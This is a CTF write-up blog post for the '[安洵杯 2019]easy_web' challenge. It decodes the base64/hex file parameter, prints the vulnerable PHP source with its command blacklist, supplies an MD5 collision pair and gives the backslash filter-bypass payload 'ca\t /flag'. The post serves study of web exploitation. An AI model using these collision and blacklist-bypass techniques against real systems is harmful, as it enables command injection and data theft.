飞雪团队

[安洵杯 2019]easy_web

Posted on 2022-2-12 14:35:42
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
<p>The challenge opens as shown above, at ?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd= ; I also looked at the page source.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
<p>The source contains "MD5 is funny", which suggests the challenge most likely revolves around MD5.</p>
<p>I then captured the request. The headers contained nothing special, so I tried starting from the URL.</p>
<p>First, base64-decode the img value once.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
<p>The result still looks like base64, so decode it a second time.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
<p>Then hex-decode that, which gives</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">555.png
</pre>
</div>
<p>Encode index.php the same way (hex, then base64 twice):</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
</div>
<p>and put that into the address bar as the img parameter.</p>
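The three-layer img encoding walked through above, as an added Python example (not part of the original writeup): the encoder reproduces the index.php value, the decoder mirrors the PHP side including its tolerance for the missing base64 padding in the challenge URL, and the last helper mirrors the server's character filter to show why only bare filenames in the web root are reachable.

```python
import base64
import binascii
import re


def encode_img(filename: str) -> str:
    """Challenge encoding for the img parameter: hex, then base64 twice."""
    hex_name = binascii.hexlify(filename.encode()).decode()
    once = base64.b64encode(hex_name.encode()).decode()
    return base64.b64encode(once.encode()).decode()


def _b64decode_lenient(s: str) -> bytes:
    """PHP's base64_decode accepts input with the trailing '=' dropped
    (the challenge URL has no padding), so re-pad before decoding."""
    s = s.strip()
    return base64.b64decode(s + "=" * (-len(s) % 4))


def decode_img(value: str) -> str:
    """Server-side inverse: base64_decode(base64_decode(img)) then hex2bin."""
    once = _b64decode_lenient(value)
    hex_name = _b64decode_lenient(once.decode())
    return binascii.unhexlify(hex_name).decode()


def sanitize_like_php(path: str) -> str:
    """Mirror of preg_replace("/[^a-zA-Z0-9.]+/", "", $file): every path
    separator is stripped, so traversal collapses to a harmless filename."""
    return re.sub(r"[^a-zA-Z0-9.]+", "", path)


if __name__ == "__main__":
    print(decode_img("TXpVek5UTTFNbVUzTURabE5qYz0"))   # 555.png
    print(encode_img("index.php"))                      # TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
    print(sanitize_like_php("../../etc/passwd"))        # ....etcpasswd
```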
<p>Then view the page source and decode the long base64 string found in it:</p>
<div class="cnblogs_code">
<pre>&lt;?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=');
// img is base64(base64(hex(filename)))
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

// only letters, digits and dots survive, so no path separators
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '&lt;img src ="./ctf3.jpeg"&gt;';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "&lt;img src='data:image/gif;base64," . $txt . "'&gt;&lt;/img&gt;";
    echo "&lt;br&gt;";
}
echo $cmd;
echo "&lt;br&gt;";
// blacklist of command names and shell metacharacters
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", $cmd)) {
    echo("forbid ~");
    echo "&lt;br&gt;";
} else {
    // MD5 gate: two distinct strings with identical MD5 digests
    if ((string)$_POST['a'] !== (string)$_POST['b'] &amp;&amp; md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?&gt;
&lt;html&gt;
&lt;style&gt;
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
&lt;/style&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
</div>
<p>Combined with the earlier inference, the key code is</p>
<div class="cnblogs_code">
<pre>    if ((string)$_POST['a'] !== (string)$_POST['b'] &amp;&amp; md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }</pre>
</div>
<p>This MD5 check calls for an MD5 strong collision: the comparison uses ===, so two different strings with byte-identical MD5 digests are needed.</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<p>That alone is enough for the server to treat the contents of cmd as a command.</p>
<p>So I used the payload:</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
<p>Because '\' is not blocked, the filter can be bypassed this way:</p>
<p>ls and l\s give the same result when executed as a command.</p>
<p>The root directory turned out to contain /flag,</p>
<p>so the payload is:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
</pre>
</div>
<p>For this challenge, since sort and dir are not blocked,</p>
<p>dir can also be used in place of ls for listing, and sort in place of cat.</p>